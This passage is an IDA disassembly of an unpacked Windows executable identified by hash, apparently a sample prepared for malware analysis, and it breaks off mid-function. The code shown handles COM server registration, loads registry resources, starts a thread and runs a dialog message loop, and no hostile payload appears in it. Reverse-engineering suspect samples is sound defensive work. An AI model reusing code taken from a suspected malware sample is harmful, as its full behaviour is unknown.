;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 990874CDACE5B30ED789B2D5109858DD
; File Name : u:\work\990874cdace5b30ed789b2d5109858dd_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000B035 ( 45109.)
; Section size in file : 0000B200 ( 45568.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: StartAddress+4�p
push ebx
push esi
push edi
mov edi, ds:WaitForSingleObject
mov esi, ecx
xor ebx, ebx
loc_40100D: ; CODE XREF: sub_401000+36�j
; sub_401000+3B�j
mov eax, [esi+88h]
push 0FFFFFFFFh ; dwMilliseconds
push eax ; hHandle
call edi ; WaitForSingleObject
loc_401018: ; CODE XREF: sub_401000+2E�j
mov ecx, [esi+88h]
push 1388h ; dwMilliseconds
push ecx ; hHandle
mov [esi+8Ch], bl
call edi ; WaitForSingleObject
test eax, eax
jz short loc_401018
cmp [esi+8Ch], bl
jnz short loc_40100D
cmp [esi+14h], ebx
jnz short loc_40100D
mov edx, [esi+88h]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, [esi+84h]
push ebx ; lParam
push ebx ; wParam
push 12h ; Msg
push eax ; idThread
call ds:PostThreadMessageA ; PostThreadMessageA
pop edi
pop esi
pop ebx
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __fastcall sub_401060(LPVOID lpParameter)
sub_401060 proc near ; CODE XREF: sub_4010C0+344�p
ThreadId = dword ptr -4
push ecx
push esi
push 0 ; lpName
push 0 ; bInitialState
push 0 ; bManualReset
mov esi, ecx
push 0 ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
test eax, eax
mov [esi+88h], eax
jnz short loc_401081
xor al, al
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401081: ; CODE XREF: sub_401060+1A�j
lea eax, [esp+8+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push esi ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
neg eax
sbb eax, eax
pop esi
neg eax
pop ecx
retn
sub_401060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_401060+29�o
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
call sub_401000
xor eax, eax
retn 4
StartAddress endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4010C0(HINSTANCE hInstance,int,int,int)
sub_4010C0 proc near ; CODE XREF: start+9F�p
szLongPath = byte ptr -234h
String = byte ptr -130h
Msg = _SYSTEM_INFO ptr -2Ch
var_8 = dword ptr -8
sz = byte ptr -4
var_2 = byte ptr -2
hInstance = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 234h
push ebx
push esi
push edi
call ds:GetCommandLineA ; GetCommandLineA
xor ebx, ebx
mov [ebp+arg_8], eax
push ebx ; pvReserved
call ds:CoInitialize
mov eax, [ebp+hInstance]
mov dword_40FB50, offset dword_40F078
push eax
push offset dword_40FB70
push offset dword_40FAE0
mov dword_40FBA8, offset dword_40FAE0
mov dword_40FAE0, 84h
mov dword_40FB44, 300h
call sub_4045A0
mov ecx, offset dword_40D688
test ecx, ecx
jz short loc_401150
mov edx, ds:dword_40D688
mov eax, ds:dword_40D68C
mov ecx, ds:dword_40D690
mov dword_40FB98, edx
mov edx, ds:dword_40D694
mov dword_40FB9C, eax
mov dword_40FBA0, ecx
mov dword_40FBA4, edx
loc_401150: ; CODE XREF: sub_4010C0+60�j
mov edi, ds:HeapCreate
push ebx ; dwMaximumSize
push ebx ; dwInitialSize
push ebx ; flOptions
call edi ; HeapCreate
mov hHeap, eax
lea eax, [ebp+Msg]
push eax ; lpSystemInfo
call ds:GetSystemInfo ; GetSystemInfo
mov eax, [ebp+Msg.dwNumberOfProcessors]
cmp eax, 1
jbe short loc_4011CC
lea edx, [eax+eax]
or ecx, 0FFFFFFFFh
xor eax, eax
loc_40117A: ; CODE XREF: sub_4010C0+CA�j
test edx, 80000000h
jnz short loc_40118C
shl edx, 1
shr ecx, 1
inc eax
cmp eax, 20h
jl short loc_40117A
loc_40118C: ; CODE XREF: sub_4010C0+C0�j
mov edx, hHeap
shr ecx, 1
mov dword_40FB54, ecx
lea ecx, ds:4[ecx*4]
push ecx ; dwBytes
push ebx ; dwFlags
push edx ; hHeap
call ds:HeapAlloc
mov dwFlags, eax
xor esi, esi
loc_4011B1: ; CODE XREF: sub_4010C0+108�j
push ebx ; dwMaximumSize
push ebx ; dwInitialSize
push ebx ; flOptions
call edi ; HeapCreate
mov ecx, dwFlags
inc esi
mov [ecx+esi*4-4], eax
mov eax, dword_40FB54
cmp esi, eax
jbe short loc_4011B1
jmp short loc_4011D8
; ---------------------------------------------------------------------------
loc_4011CC: ; CODE XREF: sub_4010C0+B0�j
mov dwFlags, ebx
mov dword_40FB54, ebx
loc_4011D8: ; CODE XREF: sub_4010C0+10A�j
call ds:GetCurrentThreadId ; GetCurrentThreadId
mov dx, word_40F0C4
lea ecx, [ebp+sz]
mov word ptr [ebp+sz], dx
mov edx, [ebp+arg_8]
mov dword_40FB64, eax
mov al, byte_40F0C6
push ecx ; lpsz
push edx ; int
mov [ebp+var_2], al
mov [ebp+var_8], ebx
call sub_403690
mov esi, eax
add esp, 8
cmp esi, ebx
jz loc_4013FF
mov edi, ds:lstrcmpiA
loc_401219: ; CODE XREF: sub_4010C0+186�j
push offset String2 ; "UnregServer"
push esi ; lpString1
call edi ; lstrcmpiA
test eax, eax
jz short loc_40124D
push offset aRegserver ; "RegServer"
push esi ; lpString1
call edi ; lstrcmpiA
test eax, eax
jz loc_401329
lea eax, [ebp+sz]
push eax ; lpsz
push esi ; int
call sub_403690
mov esi, eax
add esp, 8
cmp esi, ebx
jnz short loc_401219
jmp loc_4013FF
; ---------------------------------------------------------------------------
loc_40124D: ; CODE XREF: sub_4010C0+163�j
lea ecx, [ebp+Msg.dwNumberOfProcessors]
call sub_404540
mov edx, dword_40FBA8
lea ecx, [ebp+szLongPath]
push 104h ; nSize
push ecx ; lpFilename
mov eax, [edx+4]
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea ecx, [ebp+String]
push 104h ; cchBuffer
lea edx, [ebp+szLongPath]
push ecx ; lpszShortPath
push edx ; lpszLongPath
call ds:GetShortPathNameA ; GetShortPathNameA
lea eax, [ebp+String]
test eax, eax
jnz short loc_401298
xor esi, esi
jmp short loc_4012C8
; ---------------------------------------------------------------------------
loc_401298: ; CODE XREF: sub_4010C0+1D2�j
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
lea edx, [ebp+String]
push esi ; cchWideChar
push edx ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_4012C8: ; CODE XREF: sub_4010C0+1D6�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
lea eax, ds:2[eax*4]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi
push edi
call sub_401590
add esp, 8
lea eax, [ebp+Msg.dwNumberOfProcessors]
push edi ; int
push offset aModule ; "Module"
push eax ; int
call sub_401620
push offset Type ; "REGISTRY"
push 64h ; lpName
lea ecx, [ebp+Msg.dwNumberOfProcessors]
push esi ; lpString
push ecx ; int
call sub_4018A0
lea ecx, [ebp+Msg.dwNumberOfProcessors]
call sub_4015D0
push ebx ; int
push 1 ; bstrString
push offset dword_40FAE0 ; pptlib
call sub_404A70
mov [ebp+var_8], eax
jmp loc_40153B
; ---------------------------------------------------------------------------
loc_401329: ; CODE XREF: sub_4010C0+16F�j
lea ecx, [ebp+Msg.dwNumberOfProcessors]
call sub_404540
mov eax, dword_40FBA8
lea edx, [ebp+szLongPath]
push 104h ; nSize
push edx ; lpFilename
mov ecx, [eax+4]
push ecx ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea edx, [ebp+String]
push 104h ; cchBuffer
lea eax, [ebp+szLongPath]
push edx ; lpszShortPath
push eax ; lpszLongPath
call ds:GetShortPathNameA ; GetShortPathNameA
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_401373
xor esi, esi
jmp short loc_4013A3
; ---------------------------------------------------------------------------
loc_401373: ; CODE XREF: sub_4010C0+2AD�j
lea edx, [ebp+String]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
lea ecx, [ebp+String]
push esi ; cchWideChar
push ecx ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_4013A3: ; CODE XREF: sub_4010C0+2B1�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
lea eax, ds:2[eax*4]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi
push edi
call sub_401590
add esp, 8
lea edx, [ebp+Msg.dwNumberOfProcessors]
push edi ; int
push offset aModule ; "Module"
push edx ; int
call sub_401620
push offset Type ; "REGISTRY"
push 64h ; int
lea eax, [ebp+Msg.dwNumberOfProcessors]
push esi ; lpString
push eax ; int
call sub_401710
lea ecx, [ebp+Msg.dwNumberOfProcessors]
call sub_4015D0
push ebx
push 1
push offset dword_40FAE0
call sub_404810
mov [ebp+var_8], eax
loc_4013FF: ; CODE XREF: sub_4010C0+14D�j
; sub_4010C0+188�j
mov ecx, offset dword_40FAE0 ; lpParameter
call sub_401060
push 1 ; flags
push 4 ; dwClsContext
push offset dword_40FAE0 ; int
call sub_404630
mov al, ds:byte_40D71A
test al, al
jz short loc_401442
mov edx, [ebp+arg_8]
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
cmp byte ptr [ecx+edx-1], 75h
jnz short loc_401442
mov ecx, [ebp+hInstance]
push ecx ; hInstance
call sub_4036E0
add esp, 4
loc_401442: ; CODE XREF: sub_4010C0+35E�j
; sub_4010C0+374�j
call ds:GetCommandLineA ; GetCommandLineA
mov edi, [ebp+hInstance]
push eax ; lpString
push edi ; hInstance
call sub_4039C0
push 60h ; dwBytes
call sub_40AF50
mov esi, eax
add esp, 0Ch
cmp esi, ebx
jz short loc_4014B0
mov ecx, esi
call sub_403680
lea ecx, [esi+20h] ; int
call sub_408BE0
mov dword ptr [esi], offset off_40D698
mov [esi+1Ch], edi
mov [esi+5Ch], ebx
mov byte ptr [esi+4Ch], 0
push ebx ; dwInitParam
mov lpMem, esi
call ds:GetDesktopWindow ; GetDesktopWindow
mov ecx, lpMem
push eax ; hWndParent
call sub_404DC0
mov al, ds:byte_40D718
test al, al
jz short loc_4014B8
mov edx, lpMem
push ebx
mov eax, [edx+4]
push eax
jmp short loc_4014C4
; ---------------------------------------------------------------------------
loc_4014B0: ; CODE XREF: sub_4010C0+3A0�j
mov lpMem, ebx
jmp short loc_401526
; ---------------------------------------------------------------------------
loc_4014B8: ; CODE XREF: sub_4010C0+3E1�j
mov ecx, lpMem
push 5 ; nCmdShow
mov edx, [ecx+4]
push edx ; hWnd
loc_4014C4: ; CODE XREF: sub_4010C0+3EE�j
call ds:ShowWindow ; ShowWindow
mov esi, ds:GetMessageA
push ebx ; wMsgFilterMax
push ebx ; wMsgFilterMin
lea eax, [ebp+Msg.lpMinimumApplicationAddress]
push ebx ; hWnd
push eax ; lpMsg
call esi ; GetMessageA
test eax, eax
jz short loc_401515
mov edi, ds:IsDialogMessageA
mov ebx, ds:DispatchMessageA
loc_4014E9: ; CODE XREF: sub_4010C0+451�j
mov edx, lpMem
lea ecx, [ebp+Msg.lpMinimumApplicationAddress]
push ecx ; lpMsg
mov eax, [edx+4]
push eax ; hDlg
call edi ; IsDialogMessageA
test eax, eax
jnz short loc_401503
lea ecx, [ebp+Msg.lpMinimumApplicationAddress]
push ecx ; lpMsg
call ebx ; DispatchMessageA
loc_401503: ; CODE XREF: sub_4010C0+43B�j
push 0 ; wMsgFilterMax
push 0 ; wMsgFilterMin
lea edx, [ebp+Msg.lpMinimumApplicationAddress]
push 0 ; hWnd
push edx ; lpMsg
call esi ; GetMessageA
test eax, eax
jnz short loc_4014E9
xor ebx, ebx
loc_401515: ; CODE XREF: sub_4010C0+41B�j
mov ecx, lpMem ; lpMem
cmp ecx, ebx
jz short loc_401526
push 1 ; char
call sub_404570
loc_401526: ; CODE XREF: sub_4010C0+3F6�j
; sub_4010C0+45D�j
push offset dword_40FAE0
call sub_4046D0
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_40153B: ; CODE XREF: sub_4010C0+264�j
push offset dword_40FAE0
call sub_404720
call ds:CoUninitialize
mov eax, [ebp+var_8]
lea esp, [ebp-240h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_4010C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_401560(LPWSTR lpWideCharStr,LPCSTR lpMultiByteStr,int cchWideChar,UINT CodePage)
sub_401560 proc near ; CODE XREF: sub_4010C0+201�p
; sub_4010C0+2DC�p ...
lpWideCharStr = dword ptr 4
lpMultiByteStr = dword ptr 8
cchWideChar = dword ptr 0Ch
CodePage = dword ptr 10h
mov eax, [esp+cchWideChar]
mov ecx, [esp+lpMultiByteStr]
mov edx, [esp+CodePage]
push esi
mov esi, [esp+4+lpWideCharStr]
push eax ; cchWideChar
push esi ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ecx ; lpMultiByteStr
push 0 ; dwFlags
push edx ; CodePage
mov word ptr [esi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, esi
pop esi
retn 10h
sub_401560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401590 proc near ; CODE XREF: sub_4010C0+224�p
; sub_4010C0+2FF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
mov cx, [edx]
test cx, cx
jz short loc_4015C0
loc_4015A0: ; CODE XREF: sub_401590+2E�j
mov [eax], cx
add eax, 2
cmp word ptr [edx], 27h
jnz short loc_4015B4
mov word ptr [eax], 27h
add eax, 2
loc_4015B4: ; CODE XREF: sub_401590+1A�j
mov cx, [edx+2]
add edx, 2
test cx, cx
jnz short loc_4015A0
loc_4015C0: ; CODE XREF: sub_401590+E�j
mov word ptr [eax], 0
retn
sub_401590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015D0 proc near ; CODE XREF: sub_4010C0+24F�p
; sub_4010C0+32A�p
push ebx
mov ebx, ecx
push edi
xor edi, edi
mov eax, [ebx+4]
test eax, eax
jle short loc_401608
push ebp
mov ebp, ds:CoTaskMemFree
push esi
loc_4015E5: ; CODE XREF: sub_4015D0+34�j
mov eax, [ebx]
mov esi, [eax+edi*4]
mov ecx, [esi+4]
push ecx ; pv
call ebp ; CoTaskMemFree
mov edx, [esi]
push edx ; pv
call ebp ; CoTaskMemFree
push esi ; lpMem
call sub_40AF60
mov eax, [ebx+4]
add esp, 4
inc edi
cmp edi, eax
jl short loc_4015E5
pop esi
pop ebp
loc_401608: ; CODE XREF: sub_4015D0+B�j
mov eax, [ebx]
mov dword ptr [ebx+4], 0
push eax ; lpMem
call sub_40AF10
add esp, 4
pop edi
pop ebx
retn
sub_4015D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_401620(int,LPCWSTR lpString,int)
sub_401620 proc near ; CODE XREF: sub_4010C0+236�p
; sub_4010C0+311�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
lpString = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
push ebp
push esi
push edi
push 8 ; dwBytes
mov [esp+18h+var_4], 0
call sub_40AF50
mov ebx, eax
add esp, 4
test ebx, ebx
jz loc_401702
mov eax, [esp+14h+lpString]
mov edi, ds:lstrlenW
push eax ; lpString
call edi ; lstrlenW
lea esi, [eax+eax+2]
mov ecx, [esp+14h+arg_8]
push ecx ; lpString
call edi ; lstrlenW
mov edi, ds:CoTaskMemAlloc
push esi ; cb
lea ebp, [eax+eax+2]
call edi ; CoTaskMemAlloc
push ebp ; cb
mov [ebx], eax
call edi ; CoTaskMemAlloc
mov edi, [ebx]
mov [ebx+4], eax
test edi, edi
jz short loc_4016EA
test eax, eax
jz short loc_4016EA
mov ecx, esi
mov esi, [esp+14h+lpString]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [esp+14h+arg_8]
mov edi, [ebx+4]
mov ecx, ebp
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [esp+14h+arg_0]
mov eax, [esi+8]
mov ecx, [esi+4]
cmp ecx, eax
jnz short loc_4016CB
mov edx, [esi]
add eax, eax
mov [esi+8], eax
lea ecx, ds:0[eax*4]
push ecx ; dwBytes
push edx ; lpMem
call sub_40AEB0
add esp, 8
mov [esi], eax
loc_4016CB: ; CODE XREF: sub_401620+8F�j
mov eax, [esi]
test eax, eax
jz short loc_401702
mov ecx, [esi+4]
pop edi
mov [eax+ecx*4], ebx
mov eax, [esi+4]
inc eax
mov [esi+4], eax
mov eax, [esp+10h+var_4]
pop esi
pop ebp
pop ebx
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
loc_4016EA: ; CODE XREF: sub_401620+52�j
; sub_401620+56�j
mov esi, ds:CoTaskMemFree
push edi ; pv
call esi ; CoTaskMemFree
mov edx, [ebx+4]
push edx ; pv
call esi ; CoTaskMemFree
push ebx ; lpMem
call sub_40AF60
add esp, 4
loc_401702: ; CODE XREF: sub_401620+1B�j
; sub_401620+AF�j
pop edi
pop esi
pop ebp
mov eax, 8007000Eh
pop ebx
pop ecx
retn 0Ch
sub_401620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_401710(int,LPCWSTR lpString,int,LPCWSTR lpType)
sub_401710 proc near ; CODE XREF: sub_4010C0+322�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpString = dword ptr 0Ch
arg_8 = dword ptr 10h
lpType = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
mov ebx, [ebp+lpType]
push esi
push edi
test ebx, ebx
jnz short loc_401725
mov [ebp+lpType], ebx
jmp short loc_401757
; ---------------------------------------------------------------------------
loc_401725: ; CODE XREF: sub_401710+E�j
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
lea edi, [eax+eax+2]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov esi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [esi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov [ebp+lpType], esi
loc_401757: ; CODE XREF: sub_401710+13�j
mov eax, [ebp+arg_0]
mov esi, [ebp+arg_8]
mov ebx, [ebp+lpString]
mov [ebp+var_4], eax
xor eax, eax
and esi, 0FFFFh
cmp ebx, eax
mov [ebp+arg_8], esi
mov [ebp+var_8], eax
jz short loc_4017A9
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
lea edi, [eax+eax+2]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov esi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [esi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov eax, esi
mov esi, [ebp+arg_8]
loc_4017A9: ; CODE XREF: sub_401710+63�j
push 2 ; dwFlags
push 0 ; hFile
push eax ; lpLibFileName
call ds:LoadLibraryExA ; LoadLibraryExA
mov edi, eax
test edi, edi
mov [ebp+arg_8], edi
jnz short loc_4017EF
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jz short loc_4017E1
call esi ; GetLastError
and eax, 0FFFFh
or eax, 80070000h
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4017E1: ; CODE XREF: sub_401710+B7�j
xor eax, eax
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4017EF: ; CODE XREF: sub_401710+AB�j
mov ecx, [ebp+lpType]
push ecx ; lpType
push esi ; lpName
push edi ; hModule
call ds:FindResourceA ; FindResourceA
mov ebx, eax
test ebx, ebx
jnz short loc_401811
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jnz short loc_40182B
loc_40180D: ; CODE XREF: sub_401710+119�j
xor esi, esi
jmp short loc_401886
; ---------------------------------------------------------------------------
loc_401811: ; CODE XREF: sub_401710+EF�j
push ebx ; hResInfo
push edi ; hModule
call ds:LoadResource ; LoadResource
mov esi, eax
test esi, esi
jnz short loc_40183D
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jz short loc_40180D
loc_40182B: ; CODE XREF: sub_401710+FB�j
call esi ; GetLastError
mov esi, eax
and esi, 0FFFFh
or esi, 80070000h
jmp short loc_401886
; ---------------------------------------------------------------------------
loc_40183D: ; CODE XREF: sub_401710+10D�j
push ebx ; hResInfo
push edi ; hModule
call ds:SizeofResource ; SizeofResource
mov ebx, eax
mov eax, esi
cmp byte ptr [ebx+esi], 0
jz short loc_401879
lea edi, [ebx+1]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov ecx, edi
mov eax, esp
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edi, [ebp+arg_8]
mov byte ptr [eax+ebx], 0
loc_401879: ; CODE XREF: sub_401710+13D�j
push 1
push eax
lea ecx, [ebp+var_8]
call sub_401A30
mov esi, eax
loc_401886: ; CODE XREF: sub_401710+FF�j
; sub_401710+12B�j
push edi ; hLibModule
call ds:FreeLibrary ; FreeLibrary
lea esp, [ebp-14h]
mov eax, esi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_401710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4018A0(int,LPCWSTR lpString,LPCSTR lpName,LPCWSTR lpType)
sub_4018A0 proc near ; CODE XREF: sub_4010C0+247�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpString = dword ptr 0Ch
lpName = dword ptr 10h
lpType = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
mov ebx, [ebp+lpType]
push esi
push edi
test ebx, ebx
jnz short loc_4018B5
mov [ebp+lpType], ebx
jmp short loc_4018E7
; ---------------------------------------------------------------------------
loc_4018B5: ; CODE XREF: sub_4018A0+E�j
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
lea edi, [eax+eax+2]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov esi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [esi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov [ebp+lpType], esi
loc_4018E7: ; CODE XREF: sub_4018A0+13�j
mov eax, [ebp+lpName]
mov ebx, [ebp+lpString]
and eax, 0FFFFh
xor esi, esi
mov [ebp+lpName], eax
mov eax, [ebp+arg_0]
cmp ebx, esi
mov [ebp+var_4], eax
mov [ebp+var_8], esi
jz short loc_401933
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
lea edi, [eax+eax+2]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov esi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [esi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
loc_401933: ; CODE XREF: sub_4018A0+62�j
push 2 ; dwFlags
push 0 ; hFile
push esi ; lpLibFileName
call ds:LoadLibraryExA ; LoadLibraryExA
mov edi, eax
test edi, edi
mov [ebp+arg_0], edi
jnz short loc_401979
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jz short loc_40196B
call esi ; GetLastError
and eax, 0FFFFh
or eax, 80070000h
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_40196B: ; CODE XREF: sub_4018A0+B1�j
xor eax, eax
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_401979: ; CODE XREF: sub_4018A0+A5�j
mov ecx, [ebp+lpType]
mov edx, [ebp+lpName]
push ecx ; lpType
push edx ; lpName
push edi ; hModule
call ds:FindResourceA ; FindResourceA
mov ebx, eax
test ebx, ebx
jnz short loc_40199E
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jnz short loc_4019B8
loc_40199A: ; CODE XREF: sub_4018A0+116�j
xor esi, esi
jmp short loc_401A13
; ---------------------------------------------------------------------------
loc_40199E: ; CODE XREF: sub_4018A0+EC�j
push ebx ; hResInfo
push edi ; hModule
call ds:LoadResource ; LoadResource
mov esi, eax
test esi, esi
jnz short loc_4019CA
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jz short loc_40199A
loc_4019B8: ; CODE XREF: sub_4018A0+F8�j
call esi ; GetLastError
mov esi, eax
and esi, 0FFFFh
or esi, 80070000h
jmp short loc_401A13
; ---------------------------------------------------------------------------
loc_4019CA: ; CODE XREF: sub_4018A0+10A�j
push ebx ; hResInfo
push edi ; hModule
call ds:SizeofResource ; SizeofResource
mov ebx, eax
mov eax, esi
cmp byte ptr [ebx+esi], 0
jz short loc_401A06
lea edi, [ebx+1]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov ecx, edi
mov eax, esp
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edi, [ebp+arg_0]
mov byte ptr [eax+ebx], 0
loc_401A06: ; CODE XREF: sub_4018A0+13A�j
push 0
push eax
lea ecx, [ebp+var_8]
call sub_401A30
mov esi, eax
loc_401A13: ; CODE XREF: sub_4018A0+FC�j
; sub_4018A0+128�j
push edi ; hLibModule
call ds:FreeLibrary ; FreeLibrary
lea esp, [ebp-14h]
mov eax, esi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_4018A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A30 proc near ; CODE XREF: sub_401710+16F�p
; sub_4018A0+16C�p
arg_0 = byte ptr 4
pv = dword ptr 0Ch
String2 = byte ptr 10h
SubKey = byte ptr 30h
arg_102C = byte ptr 1030h
lpString = dword ptr 1034h
arg_1034 = dword ptr 1038h
mov eax, 1030h
call sub_40AF70
push ebx
push ebp
mov ebp, [esp+8+lpString]
push esi
push edi
xor edi, edi
mov esi, ecx
push ebp ; lpString
mov [esp+14h], edi
call ds:lstrlenA ; lstrlenA
shl eax, 1
push eax ; cb
lea ecx, [esp+14h+arg_0]
call sub_401D40
cmp [esp+10h+pv], edi
jnz short loc_401A81
push edi ; pv
call ds:CoTaskMemFree
mov edi, 8007000Eh
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
add esp, 1030h
retn 8
; ---------------------------------------------------------------------------
loc_401A81: ; CODE XREF: sub_401A30+34�j
mov [esi], ebp
mov al, [ebp+0]
test al, al
jz loc_401B33
loc_401A8E: ; CODE XREF: sub_401A30+FD�j
mov eax, [esi]
push eax ; lpsz
cmp byte ptr [eax], 25h
jnz short loc_401B13
mov ebx, ds:CharNextA
call ebx ; CharNextA
mov [esi], eax
mov cl, [eax]
cmp cl, 25h
